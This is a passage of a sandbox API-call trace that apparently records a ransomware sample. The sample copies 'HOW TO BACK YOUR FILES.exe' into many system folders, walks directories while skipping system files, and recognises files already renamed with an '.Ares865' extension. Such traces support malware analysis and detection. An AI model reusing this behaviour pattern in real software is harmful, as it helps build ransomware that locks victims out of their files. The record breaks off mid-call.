[0090.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO" [0090.202] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.202] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\visio\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.202] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.202] GetLastError () returned 0x0 [0090.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.203] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.203] CloseHandle (hObject=0x120) returned 1 [0090.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.203] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.203] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.203] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.203] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.203] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.203] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.203] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.203] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.203] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.203] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.203] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.203] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.203] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.203] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.203] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0090.203] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault" [0090.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0090.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0090.203] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault") returned 51 [0090.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault" [0090.203] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.203] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\vault\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.204] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.204] GetLastError () returned 0x0 [0090.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.204] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.204] CloseHandle (hObject=0x120) returned 1 [0090.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.204] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.204] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Vault\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.205] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.205] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.205] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.205] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.205] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0090.205] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures" [0090.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.205] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures") returned 67 [0090.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures" [0090.205] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.205] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\user account pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.206] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.206] GetLastError () returned 0x0 [0090.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.206] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.206] CloseHandle (hObject=0x120) returned 1 [0090.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.206] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.206] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63ee73e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63ee73e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.206] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.206] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.206] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.206] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63ee73e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63ee73e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.206] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.206] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.206] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.207] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.207] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat.Ares865", cAlternateFileName="5P5NRG~1.ARE")) returned 1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="aoldtz.exe") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2=".") returned 1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="..") returned 1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="windows") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="bootmgr") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="temp") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="pagefile.sys") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="boot") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="ids.txt") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="ntuser.dat") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="perflogs") returned -1 [0090.207] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="MSBuild") returned -1 [0090.207] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 32 [0090.207] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\*") returned 69 [0090.207] lstrcpyW (in: lpString1=0x2cce488, lpString2="5p5NrGJn0jS HALPmcxz.dat.Ares865" | out: lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned="5p5NrGJn0jS HALPmcxz.dat.Ares865" [0090.207] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 32 [0090.207] lstrlenW (lpString="Ares865") returned 7 [0090.207] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.207] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x646c9cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="aoldtz.exe") returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2=".") returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="..") returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="windows") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="bootmgr") returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="temp") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="pagefile.sys") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="boot") returned 1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="ids.txt") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="ntuser.dat") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="perflogs") returned -1 [0090.207] lstrcmpiW (lpString1="Default Pictures", lpString2="MSBuild") returned -1 [0090.207] lstrlenW (lpString="Default Pictures") returned 16 [0090.207] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 100 [0090.208] lstrcpyW (in: lpString1=0x2cce488, lpString2="Default Pictures" | out: lpString1="Default Pictures") returned="Default Pictures" [0090.208] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0090.208] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2c8eb8 [0090.208] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0090.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x63e9b120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="guest.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.208] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.208] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.208] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2=".") returned 1 [0090.208] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="..") returned 1 [0090.208] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="windows") returned -1 [0090.208] lstrcpyW (in: lpString1=0x2cce488, lpString2="guest.bmp.Ares865" | out: lpString1="guest.bmp.Ares865") returned="guest.bmp.Ares865" [0090.208] lstrlenW (lpString="guest.bmp.Ares865") returned 17 [0090.208] lstrlenW (lpString="Ares865") returned 7 [0090.208] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.208] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="user.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.208] lstrcmpiW (lpString1="user.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.208] lstrcmpiW (lpString1="user.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.208] lstrcpyW (in: lpString1=0x2cce488, lpString2="user.bmp.Ares865" | out: lpString1="user.bmp.Ares865") returned="user.bmp.Ares865" [0090.208] lstrlenW (lpString="user.bmp.Ares865") returned 16 [0090.208] lstrlenW (lpString="Ares865") returned 7 [0090.208] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="user.bmp.Ares865", cAlternateFileName="")) returned 0 [0090.209] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.209] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0090.209] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" [0090.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.209] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned 84 [0090.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" [0090.209] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.209] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\user account pictures\\default pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.210] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.210] GetLastError () returned 0x0 [0090.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.210] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.210] CloseHandle (hObject=0x120) returned 1 [0090.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.210] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.210] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x646c9cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 